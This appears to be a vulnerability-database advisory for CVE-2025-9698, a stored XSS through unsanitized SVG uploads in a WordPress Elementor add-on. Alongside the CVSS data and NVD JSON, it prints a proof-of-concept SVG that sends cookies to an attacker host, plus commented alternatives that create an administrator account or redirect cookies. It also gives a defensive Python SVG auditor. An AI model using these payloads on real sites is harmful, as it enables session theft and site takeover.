Security Vulnerability Report
CVE-2025-9698 CVSS 6.8 MEDIUM

CVE-2025-9698

Published: 2025-10-13 06:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Plus Addons for Elementor WordPress plugin before 6.3.16 does not sanitize SVG file contents, which could allow users with a role as low as Author to perform Stored Cross-Site Scripting attacks.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

The Plus Addons for Elementor < 6.3.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" standalone="no"?>
<!-- Malicious SVG file for Stored XSS via The Plus Addons for Elementor -->
<!-- Save as evil.svg and upload via the plugin's file upload feature -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script type="text/javascript">
    // Payload: Steal cookies and send to attacker server
    var cookie = document.cookie;
    var img = new Image();
    img.src = "https://attacker.example.com/steal?c=" + encodeURIComponent(cookie);
    // Alternative: Create admin user via AJAX
    /*
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/wp-admin/user-new.php", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.send("action=createuser&_wpnonce=xxx&user_login=hacker&[email protected]&pass1=password123&pass2=password123&role=administrator");
    */
  </script>
  <rect width="100" height="100" style="fill:red"/>
</svg>
<!-- Alternative payload using onload event -->
<!--
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS'); document.location='https://attacker.com/?cookie='+document.cookie">
  <circle cx="50" cy="50" r="40" fill="green"/>
</svg>
-->
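As an added defensive example, not part of this report and not the plugin's own code, the following Python audits an uploaded SVG for the active content that this class of Stored XSS depends on: script and foreign-document elements, event-handler attributes, script-scheme URLs in href attributes (including the whitespace-obfuscated form browsers still execute), and DTD entity declarations. The sample SVGs are constructed for the example and the function names are the example's own; it uses only the standard library.

```python
"""Audit an uploaded SVG for active content before it is stored or served.

Added example for CVE-2025-9698 (not the plugin's code). Policy: reject any
SVG that carries script, event handlers, active URL schemes or DTD entities;
a benign image needs none of these, so refusing is simpler than sanitizing.
"""
import re
import xml.etree.ElementTree as ET

# Element local names that can execute script or embed a foreign document.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# URL schemes in href / xlink:href that run code or smuggle nested documents.
FORBIDDEN_SCHEMES = ("javascript:", "vbscript:", "data:")
# Checked on the raw bytes, before any parser expands entities.
ENTITY_DECL = re.compile(rb"<!ENTITY", re.IGNORECASE)
# Browsers ignore whitespace and control characters inside a URL scheme,
# so "java\tscript:" must be treated as "javascript:".
SCHEME_NOISE = re.compile(r"[\s\x00-\x1f]")


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def audit_svg(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing active was found."""
    if ENTITY_DECL.search(data):
        # Stop before parsing: entity declarations enable XXE-style tricks
        # and expansion bombs, and no image upload legitimately needs them.
        return ["DTD entity declaration present"]
    try:
        root = ET.fromstring(data)  # expat does not fetch external DTDs
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if _local(root.tag).lower() != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag.lower() in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            lname = name.lower()
            if lname.startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif lname == "href":
                scheme = SCHEME_NOISE.sub("", value).lower()
                if scheme.startswith(FORBIDDEN_SCHEMES):
                    findings.append(f"active URL scheme in href on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """Accept/reject decision for an upload handler."""
    return not audit_svg(data)


# Constructed sample inputs for the example (not real uploads).
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <rect width="100" height="100" fill="red"/>
</svg>"""

ACTIVE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <script>alert(1)</script>
  <a href="java&#9;script:alert(1)"><circle r="4"/></a>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("active", ACTIVE_SVG)):
        print(label, "->", audit_svg(sample) or "clean")
```

Run this on the upload path that Author-role users reach; because the check works on the parsed tree rather than on regexes over text, case changes, namespace prefixes and attribute ordering do not let a script element slip past it.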

References

https://wpscan.com/vulnerability/a9539def-d92b-4117-b36a-17015c578d89/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9698",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-13T06:15:42.677",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Plus Addons for Elementor WordPress plugin before 6.3.16 does not sanitize SVG file contents, which could allow users with minimum role access as Author to perform Stored Cross-Site Scripting attacks."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 5.9
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/a9539def-d92b-4117-b36a-17015c578d89/",
        "source": "[email protected]"
      }
    ]
  }
}